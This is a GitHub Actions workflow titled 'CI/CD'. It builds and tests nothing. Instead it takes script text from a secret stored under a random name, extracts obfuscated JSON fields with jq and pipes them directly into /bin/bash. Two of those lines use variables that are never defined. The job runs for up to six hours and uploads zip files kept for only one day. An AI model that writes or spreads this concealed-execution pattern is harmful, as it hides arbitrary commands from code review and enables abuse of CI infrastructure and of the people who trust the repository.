name: CI/CD
on:
  workflow_dispatch:

jobs:
  service:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Run
        env:
          ioav1: ${{ secrets.ioav1 }}
        run: |
          printf '%s' "$ioav1" | jq -r .xm57429 | /bin/bash
          printf '%s' "$q4515" | jq -r .udj1490 | /bin/bash
          printf '%s' "$bji6" | jq -r .r16 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: iyUaeUu2
          path: "*.zip"
          retention-days: 1
